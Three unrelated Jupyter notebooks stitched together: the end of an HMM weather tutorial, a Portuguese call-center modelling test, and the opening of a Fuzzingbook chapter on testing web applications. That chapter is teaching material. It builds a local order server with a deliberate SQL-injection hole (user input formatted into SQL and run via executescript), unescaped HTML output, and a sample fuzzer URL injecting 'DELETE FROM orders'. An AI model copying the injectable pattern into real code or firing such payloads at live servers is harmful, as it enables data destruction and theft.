| | $Sunny$ | $Rainy$ |
| --- | --- | --- |
|$Sunny$| 0.80 | 0.20 |
|$Rainy$| 0.40 | 0.60 |
```
# create edges for each possible state transition in the model
# equal probability of a sequence starting on either a rainy or sunny day
model.add_transition(model.start, sunny_state, 0.5)
model.add_transition(model.start, rainy_state, 0.5)
# add sunny day transitions (we already know estimates of these probabilities
# from the problem statement)
model.add_transition(sunny_state, sunny_state, 0.8) # 80% sunny->sunny
model.add_transition(sunny_state, rainy_state, 0.2) # 20% sunny->rainy
# TODO: add rainy day transitions using the probabilities specified in the transition table
model.add_transition(rainy_state, sunny_state, 0.4) # 40% rainy->sunny
model.add_transition(rainy_state, rainy_state, 0.6) # 60% rainy->rainy
# finally, call the .bake() method to finalize the model
model.bake()
assert model.edge_count() == 6, "There should be two edges from model.start, two from Rainy, and two from Sunny"
assert model.node_count() == 4, "The states should include model.start, model.end, Rainy, and Sunny"
print("Great! You've finished the model.")
```
## Visualize the Network
---
We have provided a helper function called `show_model()` that generates a PNG image from a Pomegranate HMM network. You can specify an optional filename to save the file to disk. Setting the "show_ends" argument True will add the model start & end states that are included in every Pomegranate network.
```
show_model(model, figsize=(5, 5), filename="example.png", overwrite=True, show_ends=False)
```
### Checking the Model
The states of the model can be accessed using array syntax on the `HMM.states` attribute, and the transition matrix can be accessed by calling `HMM.dense_transition_matrix()`. Element $(i, j)$ encodes the probability of transitioning from state $i$ to state $j$. For example, with the default column order specified, element $(2, 1)$ gives the probability of transitioning from "Rainy" to "Sunny", which we specified as 0.4.
Run the next cell to inspect the full state transition matrix, then read the .
```
column_order = ["Example Model-start", "Sunny", "Rainy", "Example Model-end"] # Override the Pomegranate default order
column_names = [s.name for s in model.states]
order_index = [column_names.index(c) for c in column_order]
# re-order the rows/columns to match the specified column order
transitions = model.dense_transition_matrix()[:, order_index][order_index, :]
print("The state transition matrix, P(Xt|Xt-1):\n")
print(transitions)
print("\nThe transition probability from Rainy to Sunny is {:.0f}%".format(100 * transitions[2, 1]))
```
## Inference in Hidden Markov Models
---
Before moving on, we'll use this simple network to quickly go over the Pomegranate API to perform the three most common HMM tasks:
<div class="alert alert-block alert-info">
**Likelihood Evaluation**<br>
Given a model $\lambda=(A,B)$ and a set of observations $Y$, determine $P(Y|\lambda)$, the likelihood of observing that sequence from the model
</div>
We can use the weather prediction model to evaluate the likelihood of the sequence [yes, yes, yes, yes, yes] (or any other state sequence). The likelihood is often used in problems like machine translation to weight interpretations in conjunction with a statistical language model.
<div class="alert alert-block alert-info">
**Hidden State Decoding**<br>
Given a model $\lambda=(A,B)$ and a set of observations $Y$, determine $Q$, the most likely sequence of hidden states in the model to produce the observations
</div>
We can use the weather prediction model to determine the most likely sequence of Rainy/Sunny states for a known observation sequence, like [yes, no] -> [Rainy, Sunny]. We will use decoding in the part of speech tagger to determine the tag for each word of a sentence. The decoding can be further split into "smoothing" when we want to calculate past states, "filtering" when we want to calculate the current state, or "prediction" if we want to calculate future states.
<div class="alert alert-block alert-info">
**Parameter Learning**<br>
Given a model topography (set of states and connections) and a set of observations $Y$, learn the transition probabilities $A$ and emission probabilities $B$ of the model, $\lambda=(A,B)$
</div>
We don't need to learn the model parameters for the weather problem or POS tagging, but it is supported by Pomegranate.
### IMPLEMENTATION: Calculate Sequence Likelihood
Calculating the likelihood of an observation sequence from an HMM network is performed with the [forward algorithm](https://en.wikipedia.org/wiki/Forward_algorithm). Pomegranate provides the the `HMM.forward()` method to calculate the full matrix showing the likelihood of aligning each observation to each state in the HMM, and the `HMM.log_probability()` method to calculate the cumulative likelihood over all possible hidden state paths that the specified model generated the observation sequence.
Fill in the code in the next section with a sample observation sequence and then use the `forward()` and `log_probability()` methods to evaluate the sequence.
```
# TODO: input a sequence of 'yes'/'no' values in the list below for testing
observations = ['yes', 'no', 'yes']
assert len(observations) > 0, "You need to choose a sequence of 'yes'/'no' observations to test"
# TODO: use model.forward() to calculate the forward matrix of the observed sequence,
# and then use np.exp() to convert from log-likelihood to likelihood
forward_matrix = np.exp(model.forward(observations))
# TODO: use model.log_probability() to calculate the all-paths likelihood of the
# observed sequence and then use np.exp() to convert log-likelihood to likelihood
probability_percentage = np.exp(model.log_probability(observations))
# Display the forward probabilities
print(" " + "".join(s.name.center(len(s.name)+6) for s in model.states))
for i in range(len(observations) + 1):
print(" <start> " if i==0 else observations[i - 1].center(9), end="")
print("".join("{:.0f}%".format(100 * forward_matrix[i, j]).center(len(s.name) + 6)
for j, s in enumerate(model.states)))
print("\nThe likelihood over all possible paths " + \
"of this model producing the sequence {} is {:.2f}%\n\n"
.format(observations, 100 * probability_percentage))
```
### IMPLEMENTATION: Decoding the Most Likely Hidden State Sequence
The [Viterbi algorithm](https://en.wikipedia.org/wiki/Viterbi_algorithm) calculates the single path with the highest likelihood to produce a specific observation sequence. Pomegranate provides the `HMM.viterbi()` method to calculate both the hidden state sequence and the corresponding likelihood of the viterbi path.
This is called "decoding" because we use the observation sequence to decode the corresponding hidden state sequence. In the part of speech tagging problem, the hidden states map to parts of speech and the observations map to sentences. Given a sentence, Viterbi decoding finds the most likely sequence of part of speech tags corresponding to the sentence.
Fill in the code in the next section with the same sample observation sequence you used above, and then use the `model.viterbi()` method to calculate the likelihood and most likely state sequence. Compare the Viterbi likelihood against the forward algorithm likelihood for the observation sequence.
```
# TODO: input a sequence of 'yes'/'no' values in the list below for testing
observations = ['yes', 'no', 'yes']
# TODO: use model.viterbi to find the sequence likelihood & the most likely path
viterbi_likelihood, viterbi_path = model.viterbi(observations)
print("The most likely weather sequence to have generated " + \
"these observations is {} at {:.2f}%."
.format([s[1].name for s in viterbi_path[1:]], np.exp(viterbi_likelihood)*100)
)
```
### Forward likelihood vs Viterbi likelihood
Run the cells below to see the likelihood of each sequence of observations with length 3, and compare with the viterbi path.
```
from itertools import product
observations = ['no', 'no', 'yes']
p = {'Sunny': {'Sunny': np.log(.8), 'Rainy': np.log(.2)}, 'Rainy': {'Sunny': np.log(.4), 'Rainy': np.log(.6)}}
e = {'Sunny': {'yes': np.log(.1), 'no': np.log(.9)}, 'Rainy':{'yes':np.log(.8), 'no':np.log(.2)}}
o = observations
k = []
vprob = np.exp(model.viterbi(o)[0])
print("The likelihood of observing {} if the weather sequence is...".format(o))
for s in product(*[['Sunny', 'Rainy']]*3):
k.append(np.exp(np.log(.5)+e[s[0]][o[0]] + p[s[0]][s[1]] + e[s[1]][o[1]] + p[s[1]][s[2]] + e[s[2]][o[2]]))
print("\t{} is {:.2f}% {}".format(s, 100 * k[-1], " <-- Viterbi path" if k[-1] == vprob else ""))
print("\nThe total likelihood of observing {} over all possible paths is {:.2f}%".format(o, 100*sum(k)))
```
### Congratulations!
You've now finished the HMM warmup. You should have all the tools you need to complete the part of speech tagger project.
|
github_jupyter
|
# Teste Técnico para Ciência de Dados da Keyrus
## 1ª parte: Análise Exploratória
- [x] Tipos de variáveis
- [x] Medidas de posição
- [x] Medidas de dispersão
- [x] Tratamento de Missing Values
- [x] Gráficos
- [x] Análise de Outliers
## 2ª parte: Estatística
- [x] Estatística descritiva
- [x] Identificação das distribuições das variáveis
## 3ª parte: Modelagem
- [x] Modelos de previsão
- [x] Escolha de melhor modelo
- [x] Avaliação de resultados
- [x] Métricas
## Imports
```
# Data analysis and data wrangling
import numpy as np
import pandas as pd
# Plotting
import seaborn as sns
import matplotlib.pyplot as plt
import missingno as msno # missing values
# Preprocessing
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import PolynomialFeatures
# Machine Learning
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
# Metrics
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
# Other
from IPython.display import Image
import configparser
import warnings
import os
import time
import pprint
```
## Preparação do Diretório Principal
```
def prepare_directory_work(end_directory: str='notebooks'):
# Current path
curr_dir = os.path.dirname (os.path.realpath ("__file__"))
if curr_dir.endswith(end_directory):
os.chdir('..')
return curr_dir
return f'Current working directory: {curr_dir}'
prepare_directory_work(end_directory='notebooks')
```
## Cell Format
```
config = configparser.ConfigParser()
config.read('src/visualization/plot_config.ini')
figure_titlesize = config['figure']['figure_titlesize']
figure_figsize_large = int(config['figure']['figure_figsize_large'])
figure_figsize_width = int(config['figure']['figure_figsize_width'])
figure_dpi = int(config['figure']['figure_dpi'])
figure_facecolor = config['figure']['figure_facecolor']
figure_autolayout = bool(config['figure']['figure_autolayout'])
font_family = config['font']['font_family']
font_size = int(config['font']['font_size'])
legend_loc = config['legend']['legend_loc']
legend_fontsize = int(config['legend']['legend_fontsize'])
# Customizing file matplotlibrc
# Figure
plt.rcParams['figure.titlesize'] = figure_titlesize
plt.rcParams['figure.figsize'] = [figure_figsize_large, figure_figsize_width]
plt.rcParams['figure.dpi'] = figure_dpi
plt.rcParams['figure.facecolor'] = figure_facecolor
plt.rcParams['figure.autolayout'] = figure_autolayout
# Font
plt.rcParams['font.family'] = font_family
plt.rcParams['font.size'] = font_size
# Legend
plt.rcParams['legend.loc'] = legend_loc
plt.rcParams['legend.fontsize'] = legend_fontsize
# Guarantees visualization inside the jupyter
%matplotlib inline
# Load the "autoreload" extension so that code can change
%load_ext autoreload
# Format the data os all table (float_format 3)
pd.set_option('display.float_format', '{:.6}'.format)
# Print xxxx rows and columns
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
# Supress unnecessary warnings so that presentation looks clean
warnings.filterwarnings('ignore')
```
## Carregamento dos Dados
```
%%time
df_callcenter = pd.read_csv('data/cleansing/callcenter_marketing_clenning.csv',
encoding='utf8',
delimiter=',',
verbose=True)
df_callcenter.info()
```
OBS: carragamento em quase metade do tempo em realação a versão original do arquivo csv.
---
## Variáveis Globais
```
# Lists that will be manipulated in the data processing
list_columns = []
list_categorical_col = []
list_numerical_col = []
list_without_target_col = []
def get_col(df: 'dataframe' = None,
type_descr: 'numpy' = np.number) -> list:
"""
Function get list columns
Args:
type_descr
np.number, np.object -> return list with all columns
np.number -> return list numerical columns
np.object -> return list object columns
"""
try:
col = (df.describe(include=type_descr).columns) # pandas.core.indexes.base.Index
except ValueError:
print(f'Dataframe not contains {type_descr} columns !', end='\n')
else:
return col.tolist()
def get_col_without_target(df: 'dataframe',
list_columns: list,
target_col: str) -> list:
col_target = list_columns.copy()
col_target.remove(target_col)
print(type(col_target))
return col_target
list_numerical_col = get_col(df=df_callcenter,
type_descr=np.number)
list_categorical_col = get_col(df=df_callcenter,
type_descr=np.object)
list_columns = get_col(df=df_callcenter,
type_descr=[np.object, np.number])
list_without_target_col = get_col_without_target(df=df_callcenter,
list_columns=list_columns,
target_col='resultado')
```
## Training and Testing Dataset
- métrica: cross score
```
def cross_val_model(X,y, model, n_splits=3):
'Do split dataset and calculate cross_score'
print("Begin training", end='\n\n')
start = time.time()
X = np.array(X)
y = np.array(y)
folds = list(StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=2017).split(X, y))
for j, (train_idx, test_idx) in enumerate(folds):
X_train = X[train_idx]
y_train = y[train_idx]
X_holdout = X[test_idx]
y_holdout = y[test_idx]
print ("Fit %s fold %d" % (str(model).split('(')[0], j+1))
model.fit(X_train, y_train)
cross_score = cross_val_score(model, X_holdout, y_holdout, cv=3, scoring='roc_auc')
print("\tcross_score: %.5f" % cross_score.mean())
end = time.time()
print("\nTraining done! Time Elapsed:", end - start, " seconds.")
# training model
X = df_callcenter[list_without_target_col]
y = df_callcenter['resultado'] # target
```
---
## Modelos de Previsão
- Modelo Baseline
- Benckmarks
### Modelo Baseline
- Vou começar com um baseline, sendo o mais simples possível.
#### Linear Regression
```
# training model
X = df_callcenter[list_without_target_col]
y = df_callcenter['resultado']
print(X.shape)
print(y.shape)
# Visualize params
LinearRegression(n_jobs=-1)
# create model
lr_model = LinearRegression(n_jobs=-1, normalize=False)
# split dataset and calculate cross_score
cross_val_model(X, y, lr_model)
```
#### Linear Regression with Regularization
```
# create model
lr_ridge_model = Ridge()
# split dataset and calculate cross_score
cross_val_model(X, y, lr_ridge_model)
```
#### Polynomial Regression
```
poly = PolynomialFeatures(degree=2)
X_poly = poly.fit_transform(X)
print(X_poly.shape)
# split dataset and calculate cross_score
cross_val_model(X_poly, y, lr_model)
```
### Benckmarks
#### RandomForest
```
# Visualize params
RandomForestClassifier()
# RandomForest params dict
rf_params_one = {}
rf_params_one['n_estimators'] = 10
rf_params_one['max_depth'] = 10
rf_params_one['min_samples_split'] = 10
rf_params_one['min_samples_leaf'] = 10 # end tree necessary 30 leaf
rf_params_one['n_jobs'] = -1 # run all process
# create model
rf_model_one = RandomForestClassifier(**rf_params_one)
# training model
X = df_callcenter[list_without_target_col]
y = df_callcenter['resultado']
# split dataset and calculate cross_score
cross_val_model(X, y, rf_model_one)
# RandomForest params dict
rf_params_two = {}
rf_params_two['n_estimators'] = 1
rf_params_two['max_depth'] = len(list_numerical_col)*2
rf_params_two['min_samples_split'] = len(list_numerical_col)
rf_params_two['min_samples_leaf'] = len(list_numerical_col)
rf_params_two['n_jobs'] = -1 # run all process
# create model
rf_model = RandomForestClassifier(**rf_params_two, criterion='entropy')
# training model
X = df_callcenter[list_without_target_col]
y = df_callcenter['resultado']
# split dataset and calculate cross_score
cross_val_model(X, y, rf_model)
```
#### Random Forest Regressor
```
# Visualize params
RandomForestRegressor()
# 1st model Random Forest
rf_regressor_one = RandomForestRegressor(n_jobs = -1,
verbose = 0)
# split dataset and calculate cross_score
cross_val_model(X, y, rf_regressor_one)
# 2st model Random Forest
rf_regressor_two = RandomForestRegressor(n_estimators = 1000,
max_leaf_nodes = len(list_numerical_col)*8,
min_samples_leaf = len(list_numerical_col),
max_depth = len(list_numerical_col)*4,
n_jobs = -1,
verbose = 0)
# split dataset and calculate cross_score
cross_val_model(X, y, rf_regressor_two)
```
---
## Escolha do Melhor Modelo
Baseado no cross_score o modelo escolhido será **random forest regressor** com os parâmetros do 2º modelo, que obteve um score > 0.84.
---
#### Copyright
<a rel="license" href="http://creativecommons.org/licenses/by-sa/4.0/">
<img alt="Creative Commons License" align="right" style="border-width:0" src="https://i.creativecommons.org/l/by-sa/4.0/88x31.png" />
</a>
This work by Bruno A. R. M. Campos is licensed under a [Creative Commons license](http://creativecommons.org/licenses/by-sa/4.0/).
|
github_jupyter
|
# Testing Web Applications
In this chapter, we explore how to generate tests for Graphical User Interfaces (GUIs), notably on Web interfaces. We set up a (vulnerable) Web server and demonstrate how to systematically explore its behavior – first with hand-written grammars, then with grammars automatically inferred from the user interface. We also show how to conduct systematic attacks on these servers, notably with code and SQL injection.
```
from bookutils import YouTubeVideo
YouTubeVideo('5agY5kg8Pvk')
```
**Prerequisites**
* The techniques in this chapter make use of [grammars for fuzzing](Grammars.ipynb).
* Basic knowledge of HTML and HTTP is required.
* Knowledge of SQL databases is helpful.
## Synopsis
<!-- Automatically generated. Do not edit. -->
To [use the code provided in this chapter](Importing.ipynb), write
```python
>>> from fuzzingbook.WebFuzzer import <identifier>
```
and then make use of the following features.
This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.
### Fuzzing Web Forms
`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.
Here's the grammar extracted for our vulnerable Web server:
```python
>>> web_form_fuzzer = WebFormFuzzer(httpd_url)
>>> web_form_fuzzer.grammar['<start>']
['<action>?<query>']
>>> web_form_fuzzer.grammar['<action>']
['/order']
>>> web_form_fuzzer.grammar['<query>']
['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>']
```
Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.
```python
>>> web_form_fuzzer.fuzz()
'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='
```
Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.
Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.
### SQL Injection Attacks
`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:
```python
>>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
>>> sql_fuzzer.fuzz()
"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit="
```
As you can see, the path to be retrieved contains the payload encoded into one of the form field values.
Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.
`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.

## A Web User Interface
Let us start with a simple example. We want to set up a _Web server_ that allows readers of this book to buy fuzzingbook-branded fan articles ("swag"). In reality, we would make use of an existing Web shop (or an appropriate framework) for this purpose. For the purpose of this book, we _write our own Web server_, building on the HTTP server facilities provided by the Python library.
### Excursion: Implementing a Web Server
All of our Web server is defined in a `HTTPRequestHandler`, which, as the name suggests, handles arbitrary Web page requests.
```
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.server import HTTPStatus # type: ignore
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
"""A simple HTTP server"""
pass
```
#### Taking Orders
For our Web server, we need a number of Web pages:
* We want one page where customers can place an order.
* We want one page where they see their order confirmed.
* Additionally, we need pages display error messages such as "Page Not Found".
We start with the order form. The dictionary `FUZZINGBOOK_SWAG` holds the items that customers can order, together with long descriptions:
```
import bookutils
from typing import NoReturn, Tuple, Dict, List, Optional, Union
FUZZINGBOOK_SWAG = {
"tshirt": "One FuzzingBook T-Shirt",
"drill": "One FuzzingBook Rotary Hammer",
"lockset": "One FuzzingBook Lock Set"
}
```
This is the HTML code for the order form. The menu for selecting the swag to be ordered is created dynamically from `FUZZINGBOOK_SWAG`. We omit plenty of details such as precise shipping address, payment, shopping cart, and more.
```
HTML_ORDER_FORM = """
<html><body>
<form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Swag Order Form</strong>
<p>
Yes! Please send me at your earliest convenience
<select name="item">
"""
# (We don't use h2, h3, etc. here
# as they interfere with the notebook table of contents)
for item in FUZZINGBOOK_SWAG:
HTML_ORDER_FORM += \
'<option value="{item}">{name}</option>\n'.format(item=item,
name=FUZZINGBOOK_SWAG[item])
HTML_ORDER_FORM += """
</select>
<br>
<table>
<tr><td>
<label for="name">Name: </label><input type="text" name="name">
</td><td>
<label for="email">Email: </label><input type="email" name="email"><br>
</td></tr>
<tr><td>
<label for="city">City: </label><input type="text" name="city">
</td><td>
<label for="zip">ZIP Code: </label><input type="number" name="zip">
</tr></tr>
</table>
<input type="checkbox" name="terms"><label for="terms">I have read
the <a href="/terms">terms and conditions</a></label>.<br>
<input type="submit" name="submit" value="Place order">
</p>
</form>
</body></html>
"""
```
This is what the order form looks like:
```
from IPython.display import display
from bookutils import HTML
HTML(HTML_ORDER_FORM)
```
This form is not yet functional, as there is no server behind it; pressing "place order" will lead you to a nonexistent page.
#### Order Confirmation
Once we have gotten an order, we show a confirmation page, which is instantiated with the customer information submitted before. Here is the HTML and the rendering:
```
HTML_ORDER_RECEIVED = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong>
<p id="confirmation">
We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>
A confirmation mail will be sent to {email}.
</p>
<p>
Want more swag? Use our <a href="/">order form</a>!
</p>
</div>
</body></html>
"""
HTML(HTML_ORDER_RECEIVED.format(item_name="One FuzzingBook Rotary Hammer",
name="Jane Doe",
email="doe@example.com",
city="Seattle",
zip="98104"))
```
#### Terms and Conditions
A Web site can only be complete if it has the necessary legalese. This page shows some terms and conditions.
```
HTML_TERMS_AND_CONDITIONS = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Terms and Conditions</strong>
<p>
The content of this project is licensed under the
<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons
Attribution-NonCommercial-ShareAlike 4.0 International License.</a>
</p>
<p>
To place an order, use our <a href="/">order form</a>.
</p>
</div>
</body></html>
"""
HTML(HTML_TERMS_AND_CONDITIONS)
```
#### Storing Orders
To store orders, we make use of a *database*, stored in the file `orders.db`.
```
import sqlite3
import os
ORDERS_DB = "orders.db"
```
To interact with the database, we use *SQL commands*. The following commands create a table with five text columns for item, name, email, city, and zip – the exact same fields we also use in our HTML form.
```
def init_db():
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
db_connection = sqlite3.connect(ORDERS_DB)
db_connection.execute("DROP TABLE IF EXISTS orders")
db_connection.execute("CREATE TABLE orders "
"(item text, name text, email text, "
"city text, zip text)")
db_connection.commit()
return db_connection
db = init_db()
```
At this point, the database is still empty:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
We can add entries using the SQL `INSERT` command:
```
db.execute("INSERT INTO orders " +
"VALUES ('lockset', 'Walter White', "
"'white@jpwynne.edu', 'Albuquerque', '87101')")
db.commit()
```
These values are now in the database:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
We can also delete entries from the table again (say, after completion of the order):
```
db.execute("DELETE FROM orders WHERE name = 'Walter White'")
db.commit()
print(db.execute("SELECT * FROM orders").fetchall())
```
#### Handling HTTP Requests
We have an order form and a database; now we need a Web server which brings it all together. The Python `http.server` module provides everything we need to build a simple HTTP server. A `HTTPRequestHandler` is an object that takes and processes HTTP requests – in particular, `GET` requests for retrieving Web pages.
We implement the `do_GET()` method that, based on the given path, branches off to serve the requested Web pages. Requesting the path `/` produces the order form; a path beginning with `/order` sends an order to be processed. All other requests end in a `Page Not Found` message.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
try:
# print("GET " + self.path)
if self.path == "/":
self.send_order_form()
elif self.path.startswith("/order"):
self.handle_order()
elif self.path.startswith("/terms"):
self.send_terms_and_conditions()
else:
self.not_found()
except Exception:
self.internal_server_error()
```
##### Order Form
Accessing the home page (i.e. getting the page at `/`) is simple: We go and serve the `html_order_form` as defined above.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_form(self):
self.send_response(HTTPStatus.OK, "Place your order")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_ORDER_FORM.encode("utf8"))
```
Likewise, we can send out the terms and conditions:
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_terms_and_conditions(self):
self.send_response(HTTPStatus.OK, "Terms and Conditions")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode("utf8"))
```
##### Processing Orders
When the user clicks `Submit` on the order form, the Web browser creates and retrieves a URL of the form
```
<hostname>/order?field_1=value_1&field_2=value_2&field_3=value_3
```
where each `field_i` is the name of the field in the HTML form, and `value_i` is the value provided by the user. Values use the CGI encoding we have seen in the [chapter on coverage](Coverage.ipynb) – that is, spaces are converted into `+`, and characters that are not digits or letters are converted into `%nn`, where `nn` is the hexadecimal value of the character.
If Jane Doe <doe@example.com> from Seattle orders a T-Shirt, this is the URL the browser creates:
```
<hostname>/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104
```
When processing a query, the attribute `self.path` of the HTTP request handler holds the path accessed – i.e., everything after `<hostname>`. The helper method `get_field_values()` takes `self.path` and returns a dictionary of values.
```
import urllib.parse
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def get_field_values(self):
# Note: this fails to decode non-ASCII characters properly
query_string = urllib.parse.urlparse(self.path).query
# fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}
fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)
values = {}
for key in fields:
values[key] = fields[key][0]
return values
```
The method `handle_order()` takes these values from the URL, stores the order, and returns a page confirming the order. If anything goes wrong, it sends an internal server error.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def handle_order(self):
values = self.get_field_values()
self.store_order(values)
self.send_order_received(values)
```
Storing the order makes use of the database connection defined above; we create an SQL command instantiated with the values as extracted from the URL.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
# The following should be one line
sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)
self.log_message("%s", sql_command)
db.executescript(sql_command)
db.commit()
```
After storing the order, we send the confirmation HTML page, which again is instantiated with the values from the URL.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_received(self, values):
# Should use html.escape()
values["item_name"] = FUZZINGBOOK_SWAG[values["item"]]
confirmation = HTML_ORDER_RECEIVED.format(**values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
```
##### Other HTTP commands
Besides the `GET` command (which does all the heavy lifting), HTTP servers can also support other HTTP commands; we support the `HEAD` command, which returns the head information of a Web page. In our case, this is always empty.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def do_HEAD(self):
# print("HEAD " + self.path)
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", "text/html")
self.end_headers()
```
#### Error Handling
We have defined pages for submitting and processing orders; now we also need a few pages for errors that might occur.
##### Page Not Found
This page is displayed if a non-existing page (i.e. anything except `/` or `/order`) is requested.
```
HTML_NOT_FOUND = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Sorry.</strong>
<p>
This page does not exist. Try our <a href="/">order form</a> instead.
</p>
</div>
</body></html>
"""
HTML(HTML_NOT_FOUND)
```
The method `not_found()` takes care of sending this out with the appropriate HTTP status code.
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def not_found(self):
self.send_response(HTTPStatus.NOT_FOUND, "Not found")
self.send_header("Content-type", "text/html")
self.end_headers()
message = HTML_NOT_FOUND
self.wfile.write(message.encode("utf8"))
```
##### Internal Errors
This page is shown for any internal errors that might occur. For diagnostic purposes, we have it include the traceback of the failing function.
```
HTML_INTERNAL_SERVER_ERROR = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Internal Server Error</strong>
<p>
The server has encountered an internal error. Go to our <a href="/">order form</a>.
<pre>{error_message}</pre>
</p>
</div>
</body></html>
"""
HTML(HTML_INTERNAL_SERVER_ERROR)
import sys
import traceback
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc)
self.wfile.write(message.encode("utf8"))
```
#### Logging
Our server runs as a separate process in the background, waiting to receive commands at all time. To see what it is doing, we implement a special logging mechanism. The `httpd_message_queue` establishes a queue into which one process (the server) can store Python objects, and in which another process (the notebook) can retrieve them. We use this to pass log messages from the server, which we can then display in the notebook.
For multiprocessing, we use the `multiprocess` module - a variant of the standard Python `multiprocessing` module that also works in notebooks. If you are running this code outside of a notebook, you can also use `multiprocessing` instead.
```
from multiprocess import Queue # type: ignore
HTTPD_MESSAGE_QUEUE = Queue()
```
Let us place two messages in the queue:
```
HTTPD_MESSAGE_QUEUE.put("I am another message")
HTTPD_MESSAGE_QUEUE.put("I am one more message")
```
To distinguish server messages from other parts of the notebook, we format them specially:
```
from bookutils import rich_output, terminal_escape
def display_httpd_message(message: str) -> None:
if rich_output():
display(
HTML(
'<pre style="background: NavajoWhite;">' +
message +
"</pre>"))
else:
print(terminal_escape(message))
display_httpd_message("I am a httpd server message")
```
The method `print_httpd_messages()` prints all messages accumulated in the queue so far:
```
def print_httpd_messages():
while not HTTPD_MESSAGE_QUEUE.empty():
message = HTTPD_MESSAGE_QUEUE.get()
display_httpd_message(message)
import time
time.sleep(1)
print_httpd_messages()
```
With `clear_httpd_messages()`, we can silently discard all pending messages:
```
def clear_httpd_messages() -> None:
while not HTTPD_MESSAGE_QUEUE.empty():
HTTPD_MESSAGE_QUEUE.get()
```
The method `log_message()` in the request handler makes use of the queue to store its messages:
```
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def log_message(self, format: str, *args) -> None:
message = ("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
HTTPD_MESSAGE_QUEUE.put(message)
```
In [the chapter on carving](Carver.ipynb), we had introduced a `webbrowser()` method which retrieves the contents of the given URL. We now extend it such that it also prints out any log messages produced by the server:
```
import requests
def webbrowser(url: str, mute: bool = False) -> str:
"""Download and return the http/https resource given by the URL"""
try:
r = requests.get(url)
contents = r.text
finally:
if not mute:
print_httpd_messages()
else:
clear_httpd_messages()
return contents
```
With `webbrowser()`, we are now ready to get the Web server up and running.
### End of Excursion
### Running the Server
We run the server on the *local host* – that is, the same machine which also runs this notebook. We check for an accessible port and put the resulting URL in the queue created earlier.
```
def run_httpd_forever(handler_class: type) -> NoReturn: # type: ignore
host = "127.0.0.1" # localhost IP
for port in range(8800, 9000):
httpd_address = (host, port)
try:
httpd = HTTPServer(httpd_address, handler_class)
break
except OSError:
continue
httpd_url = "http://" + host + ":" + repr(port)
